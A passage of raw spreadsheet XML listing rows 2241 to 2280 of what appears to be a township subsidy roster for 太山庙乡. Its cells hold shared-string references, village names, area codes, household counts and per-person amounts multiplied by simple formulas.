      </c>
      <c r="I2241" s="24">
        <f t="shared" si="34"/>
        <v>650</v>
      </c>
      <c r="J2241" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2241" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2242" customHeight="1" spans="1:11">
      <c r="A2242" s="23" t="s">
        <v>5895</v>
      </c>
      <c r="B2242" s="24" t="str">
        <f>B2241</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2242" s="24" t="str">
        <f>C2241</f>
        <v>毛庄村</v>
      </c>
      <c r="D2242" s="30" t="s">
        <v>5896</v>
      </c>
      <c r="E2242" s="30" t="s">
        <v>5897</v>
      </c>
      <c r="F2242" s="24">
        <f>F2241</f>
        <v>4113210704</v>
      </c>
      <c r="G2242" s="24"/>
      <c r="H2242" s="24"/>
      <c r="I2242" s="24">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="J2242" s="24"/>
      <c r="K2242" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2243" customHeight="1" spans="1:11">
      <c r="A2243" s="23" t="s">
        <v>5898</v>
      </c>
      <c r="B2243" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2243" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2243" s="24" t="s">
        <v>5899</v>
      </c>
      <c r="E2243" s="24" t="s">
        <v>5385</v>
      </c>
      <c r="F2243" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2243" s="24">
        <v>1</v>
      </c>
      <c r="H2243" s="25">
        <v>365</v>
      </c>
      <c r="I2243" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2243" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2243" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2244" customHeight="1" spans="1:11">
      <c r="A2244" s="23" t="s">
        <v>5900</v>
      </c>
      <c r="B2244" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2244" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="D2244" s="24" t="s">
        <v>5901</v>
      </c>
      <c r="E2244" s="24" t="s">
        <v>5902</v>
      </c>
      <c r="F2244" s="24" t="s">
        <v>5903</v>
      </c>
      <c r="G2244" s="24">
        <v>1</v>
      </c>
      <c r="H2244" s="25">
        <v>365</v>
      </c>
      <c r="I2244" s="24">
        <f t="shared" ref="I2244:I2307" si="35">H2244*G2244</f>
        <v>365</v>
      </c>
      <c r="J2244" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2244" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2245" customHeight="1" spans="1:11">
      <c r="A2245" s="23" t="s">
        <v>5904</v>
      </c>
      <c r="B2245" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2245" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2245" s="24" t="s">
        <v>5905</v>
      </c>
      <c r="E2245" s="24" t="s">
        <v>5397</v>
      </c>
      <c r="F2245" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2245" s="24">
        <v>1</v>
      </c>
      <c r="H2245" s="25">
        <v>365</v>
      </c>
      <c r="I2245" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2245" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2245" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2246" customHeight="1" spans="1:11">
      <c r="A2246" s="23" t="s">
        <v>5906</v>
      </c>
      <c r="B2246" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2246" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="D2246" s="24" t="s">
        <v>5907</v>
      </c>
      <c r="E2246" s="24" t="s">
        <v>5015</v>
      </c>
      <c r="F2246" s="24">
        <v>4113210712</v>
      </c>
      <c r="G2246" s="24">
        <v>1</v>
      </c>
      <c r="H2246" s="25">
        <v>365</v>
      </c>
      <c r="I2246" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2246" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2246" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2247" customHeight="1" spans="1:11">
      <c r="A2247" s="23" t="s">
        <v>5908</v>
      </c>
      <c r="B2247" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2247" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="D2247" s="24" t="s">
        <v>5909</v>
      </c>
      <c r="E2247" s="24" t="s">
        <v>5910</v>
      </c>
      <c r="F2247" s="24">
        <v>4113210714</v>
      </c>
      <c r="G2247" s="24">
        <v>1</v>
      </c>
      <c r="H2247" s="25">
        <v>365</v>
      </c>
      <c r="I2247" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2247" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2247" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2248" customHeight="1" spans="1:11">
      <c r="A2248" s="23" t="s">
        <v>5911</v>
      </c>
      <c r="B2248" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2248" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2248" s="24" t="s">
        <v>5912</v>
      </c>
      <c r="E2248" s="24" t="s">
        <v>5523</v>
      </c>
      <c r="F2248" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2248" s="24">
        <v>1</v>
      </c>
      <c r="H2248" s="25">
        <v>365</v>
      </c>
      <c r="I2248" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2248" s="24" t="s">
        <v>5913</v>
      </c>
      <c r="K2248" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2249" customHeight="1" spans="1:11">
      <c r="A2249" s="23" t="s">
        <v>5914</v>
      </c>
      <c r="B2249" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2249" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2249" s="24" t="s">
        <v>5915</v>
      </c>
      <c r="E2249" s="24" t="s">
        <v>5411</v>
      </c>
      <c r="F2249" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2249" s="24">
        <v>1</v>
      </c>
      <c r="H2249" s="25">
        <v>365</v>
      </c>
      <c r="I2249" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2249" s="24" t="s">
        <v>5916</v>
      </c>
      <c r="K2249" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2250" customHeight="1" spans="1:11">
      <c r="A2250" s="23" t="s">
        <v>5917</v>
      </c>
      <c r="B2250" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2250" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="D2250" s="24" t="s">
        <v>5918</v>
      </c>
      <c r="E2250" s="24" t="s">
        <v>5390</v>
      </c>
      <c r="F2250" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2250" s="24">
        <v>2</v>
      </c>
      <c r="H2250" s="25">
        <v>340</v>
      </c>
      <c r="I2250" s="24">
        <f t="shared" si="35"/>
        <v>680</v>
      </c>
      <c r="J2250" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2250" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2251" customHeight="1" spans="1:11">
      <c r="A2251" s="23" t="s">
        <v>5919</v>
      </c>
      <c r="B2251" s="24" t="str">
        <f>B2250</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2251" s="24" t="str">
        <f>C2250</f>
        <v>太山庙乡</v>
      </c>
      <c r="D2251" s="23" t="s">
        <v>5920</v>
      </c>
      <c r="E2251" s="24" t="s">
        <v>3445</v>
      </c>
      <c r="F2251" s="24" t="str">
        <f>F2250</f>
        <v>4113210705</v>
      </c>
      <c r="G2251" s="24"/>
      <c r="H2251" s="24"/>
      <c r="I2251" s="24">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="J2251" s="24"/>
      <c r="K2251" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2252" customHeight="1" spans="1:11">
      <c r="A2252" s="23" t="s">
        <v>5921</v>
      </c>
      <c r="B2252" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2252" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="D2252" s="24" t="s">
        <v>5922</v>
      </c>
      <c r="E2252" s="24" t="s">
        <v>5923</v>
      </c>
      <c r="F2252" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2252" s="24">
        <v>1</v>
      </c>
      <c r="H2252" s="24">
        <v>500</v>
      </c>
      <c r="I2252" s="24">
        <f t="shared" si="35"/>
        <v>500</v>
      </c>
      <c r="J2252" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2252" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2253" customHeight="1" spans="1:11">
      <c r="A2253" s="23" t="s">
        <v>5924</v>
      </c>
      <c r="B2253" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2253" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2253" s="24" t="s">
        <v>5925</v>
      </c>
      <c r="E2253" s="24" t="s">
        <v>5666</v>
      </c>
      <c r="F2253" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2253" s="24">
        <v>2</v>
      </c>
      <c r="H2253" s="25">
        <v>325</v>
      </c>
      <c r="I2253" s="24">
        <f t="shared" si="35"/>
        <v>650</v>
      </c>
      <c r="J2253" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2253" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2254" customHeight="1" spans="1:11">
      <c r="A2254" s="23" t="s">
        <v>5926</v>
      </c>
      <c r="B2254" s="24" t="str">
        <f>B2253</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2254" s="24" t="str">
        <f>C2253</f>
        <v>毛庄村</v>
      </c>
      <c r="D2254" s="54" t="s">
        <v>1093</v>
      </c>
      <c r="E2254" s="55" t="s">
        <v>5453</v>
      </c>
      <c r="F2254" s="24">
        <f>F2253</f>
        <v>4113210704</v>
      </c>
      <c r="G2254" s="24"/>
      <c r="H2254" s="24"/>
      <c r="I2254" s="24">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="J2254" s="41"/>
      <c r="K2254" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2255" customHeight="1" spans="1:11">
      <c r="A2255" s="23" t="s">
        <v>5927</v>
      </c>
      <c r="B2255" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2255" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2255" s="24" t="s">
        <v>5928</v>
      </c>
      <c r="E2255" s="24" t="s">
        <v>5929</v>
      </c>
      <c r="F2255" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2255" s="24">
        <v>1</v>
      </c>
      <c r="H2255" s="25">
        <v>365</v>
      </c>
      <c r="I2255" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2255" s="41">
        <v>45536</v>
      </c>
      <c r="K2255" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2256" customHeight="1" spans="1:11">
      <c r="A2256" s="23" t="s">
        <v>5930</v>
      </c>
      <c r="B2256" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2256" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2256" s="24" t="s">
        <v>5931</v>
      </c>
      <c r="E2256" s="24" t="s">
        <v>5814</v>
      </c>
      <c r="F2256" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2256" s="24">
        <v>1</v>
      </c>
      <c r="H2256" s="25">
        <v>365</v>
      </c>
      <c r="I2256" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2256" s="24">
        <v>45139</v>
      </c>
      <c r="K2256" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2257" customHeight="1" spans="1:11">
      <c r="A2257" s="23" t="s">
        <v>5932</v>
      </c>
      <c r="B2257" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2257" s="24" t="s">
        <v>5933</v>
      </c>
      <c r="D2257" s="24" t="s">
        <v>5934</v>
      </c>
      <c r="E2257" s="24" t="s">
        <v>3251</v>
      </c>
      <c r="F2257" s="24" t="s">
        <v>5892</v>
      </c>
      <c r="G2257" s="24">
        <v>2</v>
      </c>
      <c r="H2257" s="25">
        <v>325</v>
      </c>
      <c r="I2257" s="24">
        <f t="shared" si="35"/>
        <v>650</v>
      </c>
      <c r="J2257" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2257" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2258" customHeight="1" spans="1:11">
      <c r="A2258" s="23" t="s">
        <v>5935</v>
      </c>
      <c r="B2258" s="24" t="str">
        <f>B2257</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2258" s="24" t="str">
        <f>C2257</f>
        <v>长江厂</v>
      </c>
      <c r="D2258" s="88" t="s">
        <v>5936</v>
      </c>
      <c r="E2258" s="88" t="s">
        <v>5937</v>
      </c>
      <c r="F2258" s="24" t="str">
        <f>F2257</f>
        <v>4113210712</v>
      </c>
      <c r="G2258" s="24"/>
      <c r="H2258" s="24"/>
      <c r="I2258" s="24">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="J2258" s="24"/>
      <c r="K2258" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2259" customHeight="1" spans="1:11">
      <c r="A2259" s="23" t="s">
        <v>5938</v>
      </c>
      <c r="B2259" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2259" s="24" t="s">
        <v>5933</v>
      </c>
      <c r="D2259" s="24" t="s">
        <v>5939</v>
      </c>
      <c r="E2259" s="24" t="s">
        <v>5414</v>
      </c>
      <c r="F2259" s="24" t="s">
        <v>5892</v>
      </c>
      <c r="G2259" s="24">
        <v>3</v>
      </c>
      <c r="H2259" s="25">
        <v>320</v>
      </c>
      <c r="I2259" s="24">
        <f t="shared" si="35"/>
        <v>960</v>
      </c>
      <c r="J2259" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2259" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2260" customHeight="1" spans="1:11">
      <c r="A2260" s="23" t="s">
        <v>5940</v>
      </c>
      <c r="B2260" s="24" t="str">
        <f>B2259</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2260" s="24" t="str">
        <f>C2259</f>
        <v>长江厂</v>
      </c>
      <c r="D2260" s="88" t="s">
        <v>5941</v>
      </c>
      <c r="E2260" s="30" t="s">
        <v>3344</v>
      </c>
      <c r="F2260" s="24" t="str">
        <f>F2259</f>
        <v>4113210712</v>
      </c>
      <c r="G2260" s="24"/>
      <c r="H2260" s="24"/>
      <c r="I2260" s="24">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="J2260" s="24"/>
      <c r="K2260" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2261" customHeight="1" spans="1:11">
      <c r="A2261" s="23" t="s">
        <v>5942</v>
      </c>
      <c r="B2261" s="24" t="str">
        <f>B2260</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2261" s="24" t="str">
        <f>C2260</f>
        <v>长江厂</v>
      </c>
      <c r="D2261" s="89" t="s">
        <v>5943</v>
      </c>
      <c r="E2261" s="89" t="s">
        <v>5944</v>
      </c>
      <c r="F2261" s="24" t="str">
        <f>F2260</f>
        <v>4113210712</v>
      </c>
      <c r="G2261" s="24"/>
      <c r="H2261" s="24"/>
      <c r="I2261" s="24">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="J2261" s="24"/>
      <c r="K2261" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2262" customHeight="1" spans="1:11">
      <c r="A2262" s="23" t="s">
        <v>5945</v>
      </c>
      <c r="B2262" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2262" s="24" t="s">
        <v>5933</v>
      </c>
      <c r="D2262" s="24" t="s">
        <v>5946</v>
      </c>
      <c r="E2262" s="24" t="s">
        <v>5544</v>
      </c>
      <c r="F2262" s="24" t="s">
        <v>5892</v>
      </c>
      <c r="G2262" s="24">
        <v>1</v>
      </c>
      <c r="H2262" s="25">
        <v>365</v>
      </c>
      <c r="I2262" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2262" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2262" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2263" customHeight="1" spans="1:11">
      <c r="A2263" s="23" t="s">
        <v>5947</v>
      </c>
      <c r="B2263" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2263" s="24" t="s">
        <v>5933</v>
      </c>
      <c r="D2263" s="24" t="s">
        <v>5948</v>
      </c>
      <c r="E2263" s="24" t="s">
        <v>5949</v>
      </c>
      <c r="F2263" s="24" t="s">
        <v>5892</v>
      </c>
      <c r="G2263" s="24">
        <v>2</v>
      </c>
      <c r="H2263" s="25">
        <v>325</v>
      </c>
      <c r="I2263" s="24">
        <f t="shared" si="35"/>
        <v>650</v>
      </c>
      <c r="J2263" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2263" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2264" customHeight="1" spans="1:11">
      <c r="A2264" s="23" t="s">
        <v>5950</v>
      </c>
      <c r="B2264" s="24" t="str">
        <f>B2263</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2264" s="24" t="str">
        <f>C2263</f>
        <v>长江厂</v>
      </c>
      <c r="D2264" s="30" t="s">
        <v>5951</v>
      </c>
      <c r="E2264" s="31" t="s">
        <v>5952</v>
      </c>
      <c r="F2264" s="24" t="str">
        <f>F2263</f>
        <v>4113210712</v>
      </c>
      <c r="G2264" s="24"/>
      <c r="H2264" s="24"/>
      <c r="I2264" s="24">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="J2264" s="24"/>
      <c r="K2264" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2265" customHeight="1" spans="1:11">
      <c r="A2265" s="23" t="s">
        <v>5953</v>
      </c>
      <c r="B2265" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2265" s="24" t="s">
        <v>5933</v>
      </c>
      <c r="D2265" s="24" t="s">
        <v>5954</v>
      </c>
      <c r="E2265" s="24" t="s">
        <v>5479</v>
      </c>
      <c r="F2265" s="24" t="s">
        <v>5892</v>
      </c>
      <c r="G2265" s="24">
        <v>1</v>
      </c>
      <c r="H2265" s="25">
        <v>365</v>
      </c>
      <c r="I2265" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2265" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2265" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2266" customHeight="1" spans="1:11">
      <c r="A2266" s="23" t="s">
        <v>5955</v>
      </c>
      <c r="B2266" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2266" s="24" t="s">
        <v>5933</v>
      </c>
      <c r="D2266" s="24" t="s">
        <v>5956</v>
      </c>
      <c r="E2266" s="24" t="s">
        <v>5850</v>
      </c>
      <c r="F2266" s="24" t="s">
        <v>5892</v>
      </c>
      <c r="G2266" s="24">
        <v>1</v>
      </c>
      <c r="H2266" s="25">
        <v>365</v>
      </c>
      <c r="I2266" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2266" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2266" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2267" customHeight="1" spans="1:11">
      <c r="A2267" s="23" t="s">
        <v>5957</v>
      </c>
      <c r="B2267" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2267" s="24" t="s">
        <v>5933</v>
      </c>
      <c r="D2267" s="24" t="s">
        <v>5958</v>
      </c>
      <c r="E2267" s="24" t="s">
        <v>5419</v>
      </c>
      <c r="F2267" s="24" t="s">
        <v>5892</v>
      </c>
      <c r="G2267" s="24">
        <v>1</v>
      </c>
      <c r="H2267" s="25">
        <v>365</v>
      </c>
      <c r="I2267" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2267" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2267" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2268" customHeight="1" spans="1:11">
      <c r="A2268" s="23" t="s">
        <v>5959</v>
      </c>
      <c r="B2268" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2268" s="24" t="s">
        <v>5933</v>
      </c>
      <c r="D2268" s="24" t="s">
        <v>5960</v>
      </c>
      <c r="E2268" s="24" t="s">
        <v>5493</v>
      </c>
      <c r="F2268" s="24" t="s">
        <v>5892</v>
      </c>
      <c r="G2268" s="24">
        <v>1</v>
      </c>
      <c r="H2268" s="25">
        <v>365</v>
      </c>
      <c r="I2268" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2268" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2268" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2269" customHeight="1" spans="1:11">
      <c r="A2269" s="23" t="s">
        <v>5961</v>
      </c>
      <c r="B2269" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2269" s="24" t="s">
        <v>5933</v>
      </c>
      <c r="D2269" s="24" t="s">
        <v>5962</v>
      </c>
      <c r="E2269" s="24" t="s">
        <v>2233</v>
      </c>
      <c r="F2269" s="24" t="s">
        <v>5892</v>
      </c>
      <c r="G2269" s="24">
        <v>1</v>
      </c>
      <c r="H2269" s="25">
        <v>365</v>
      </c>
      <c r="I2269" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2269" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2269" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2270" customHeight="1" spans="1:11">
      <c r="A2270" s="23" t="s">
        <v>5963</v>
      </c>
      <c r="B2270" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2270" s="24" t="s">
        <v>5933</v>
      </c>
      <c r="D2270" s="24" t="s">
        <v>5964</v>
      </c>
      <c r="E2270" s="24" t="s">
        <v>5493</v>
      </c>
      <c r="F2270" s="24" t="s">
        <v>5892</v>
      </c>
      <c r="G2270" s="24">
        <v>2</v>
      </c>
      <c r="H2270" s="25">
        <v>325</v>
      </c>
      <c r="I2270" s="24">
        <f t="shared" si="35"/>
        <v>650</v>
      </c>
      <c r="J2270" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2270" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2271" customHeight="1" spans="1:11">
      <c r="A2271" s="23" t="s">
        <v>5965</v>
      </c>
      <c r="B2271" s="24" t="str">
        <f>B2270</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2271" s="24" t="str">
        <f>C2270</f>
        <v>长江厂</v>
      </c>
      <c r="D2271" s="30" t="s">
        <v>5966</v>
      </c>
      <c r="E2271" s="31" t="s">
        <v>5967</v>
      </c>
      <c r="F2271" s="24" t="str">
        <f>F2270</f>
        <v>4113210712</v>
      </c>
      <c r="G2271" s="24"/>
      <c r="H2271" s="24"/>
      <c r="I2271" s="24">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="J2271" s="24"/>
      <c r="K2271" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2272" customHeight="1" spans="1:11">
      <c r="A2272" s="23" t="s">
        <v>5968</v>
      </c>
      <c r="B2272" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2272" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D2272" s="24" t="s">
        <v>5969</v>
      </c>
      <c r="E2272" s="24" t="s">
        <v>4359</v>
      </c>
      <c r="F2272" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2272" s="24">
        <v>1</v>
      </c>
      <c r="H2272" s="25">
        <v>365</v>
      </c>
      <c r="I2272" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2272" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2272" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2273" customHeight="1" spans="1:11">
      <c r="A2273" s="23" t="s">
        <v>5970</v>
      </c>
      <c r="B2273" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2273" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D2273" s="24" t="s">
        <v>5971</v>
      </c>
      <c r="E2273" s="24" t="s">
        <v>5972</v>
      </c>
      <c r="F2273" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2273" s="24">
        <v>1</v>
      </c>
      <c r="H2273" s="25">
        <v>365</v>
      </c>
      <c r="I2273" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2273" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2273" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2274" customHeight="1" spans="1:11">
      <c r="A2274" s="23" t="s">
        <v>5973</v>
      </c>
      <c r="B2274" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2274" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D2274" s="24" t="s">
        <v>5974</v>
      </c>
      <c r="E2274" s="24" t="s">
        <v>5975</v>
      </c>
      <c r="F2274" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2274" s="24">
        <v>2</v>
      </c>
      <c r="H2274" s="25">
        <v>325</v>
      </c>
      <c r="I2274" s="24">
        <f t="shared" si="35"/>
        <v>650</v>
      </c>
      <c r="J2274" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2274" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2275" customHeight="1" spans="1:11">
      <c r="A2275" s="23" t="s">
        <v>5976</v>
      </c>
      <c r="B2275" s="24" t="str">
        <f>B2274</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2275" s="24" t="str">
        <f>C2274</f>
        <v>供销社</v>
      </c>
      <c r="D2275" s="31" t="s">
        <v>5977</v>
      </c>
      <c r="E2275" s="31" t="s">
        <v>5978</v>
      </c>
      <c r="F2275" s="24" t="str">
        <f>F2274</f>
        <v>4113210705</v>
      </c>
      <c r="G2275" s="24"/>
      <c r="H2275" s="24"/>
      <c r="I2275" s="24">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="J2275" s="24"/>
      <c r="K2275" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2276" customHeight="1" spans="1:11">
      <c r="A2276" s="23" t="s">
        <v>5979</v>
      </c>
      <c r="B2276" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2276" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D2276" s="24" t="s">
        <v>5980</v>
      </c>
      <c r="E2276" s="24" t="s">
        <v>5981</v>
      </c>
      <c r="F2276" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2276" s="24">
        <v>2</v>
      </c>
      <c r="H2276" s="25">
        <v>325</v>
      </c>
      <c r="I2276" s="24">
        <f t="shared" si="35"/>
        <v>650</v>
      </c>
      <c r="J2276" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2276" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2277" customHeight="1" spans="1:11">
      <c r="A2277" s="23" t="s">
        <v>5982</v>
      </c>
      <c r="B2277" s="24" t="str">
        <f>B2276</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2277" s="24" t="str">
        <f>C2276</f>
        <v>供销社</v>
      </c>
      <c r="D2277" s="31" t="s">
        <v>5983</v>
      </c>
      <c r="E2277" s="31" t="s">
        <v>5984</v>
      </c>
      <c r="F2277" s="24" t="str">
        <f>F2276</f>
        <v>4113210705</v>
      </c>
      <c r="G2277" s="24"/>
      <c r="H2277" s="24"/>
      <c r="I2277" s="24">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="J2277" s="24"/>
      <c r="K2277" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2278" customHeight="1" spans="1:11">
      <c r="A2278" s="23" t="s">
        <v>5985</v>
      </c>
      <c r="B2278" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2278" s="24" t="s">
        <v>3434</v>
      </c>
      <c r="D2278" s="24" t="s">
        <v>5986</v>
      </c>
      <c r="E2278" s="24" t="s">
        <v>5397</v>
      </c>
      <c r="F2278" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2278" s="24">
        <v>1</v>
      </c>
      <c r="H2278" s="25">
        <v>365</v>
      </c>
      <c r="I2278" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2278" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2278" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2279" customHeight="1" spans="1:11">
      <c r="A2279" s="23" t="s">
        <v>5987</v>
      </c>
      <c r="B2279" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2279" s="24" t="s">
        <v>5988</v>
      </c>
      <c r="D2279" s="24" t="s">
        <v>5989</v>
      </c>
      <c r="E2279" s="24" t="s">
        <v>5902</v>
      </c>
      <c r="F2279" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2279" s="24">
        <v>1</v>
      </c>
      <c r="H2279" s="25">
        <v>365</v>
      </c>
      <c r="I2279" s="24">
        <f t="shared" si="35"/>
        <v>365</v>
      </c>
      <c r="J2279" s="24" t="s">
        <v>4166</v>
      </c>
      <c r="K2279" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2280" customHeight="1" spans="1:11">
      <c r="A2280" s="23" t="s">
        <v>5990</v>
      </c>
      <c r="B2280" s="24" t="s">
        <v>5352</v>
